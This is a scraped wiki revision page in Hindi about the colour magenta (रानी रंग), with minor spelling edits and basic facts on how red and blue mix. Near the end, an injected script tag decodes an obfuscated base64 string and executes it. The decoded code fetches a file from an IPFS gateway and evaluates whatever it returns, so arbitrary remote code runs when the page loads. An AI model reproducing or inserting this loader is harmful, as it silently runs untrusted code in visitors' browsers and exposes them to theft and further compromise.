Difference between revisions of "रानी रंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - "ते है।" to "ते हैं।")
Line 1: Line 1:
[[रंग|रंगो]] का हमारे जीवन में बहुत महत्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते है। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
+
[[रंग|रंगो]] का हमारे जीवन में बहुत महत्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते हैं। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
 
*रानी [[रंग]] को अँग्रेजी में मैजेंटा कहते हैं ।  
 
*रानी [[रंग]] को अँग्रेजी में मैजेंटा कहते हैं ।  
 
*यह एक [[द्वितीयक रंग]] है।  
 
*यह एक [[द्वितीयक रंग]] है।  

Revision as of 08:35, 20 February 2011

rango ka hamare jivan mean bahut mahatv hai. rango se hamean vibhinn sthitiyoan ka pata chalata hai. ham apane charoan taraph anek prakar ke rango se prabhavit hote haian. rang, manavi aankhoan ke varnakram se milane par chhaya sambandhi gatividhiyoan se utpann hote haian.

  • rani rang ko aangreji mean maijeanta kahate haian .
  • yah ek dvitiyak rang hai.
  • yah pili v hari prakash ki kiranoan ke viparit mean banata hai, arthat isake viparit isaki tarang dairdhy 500–530 nainomitar hoti hai .
  • rani rang lal rang v nile rang ke mishran se prapt hota hai.

lal + nila = rani


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh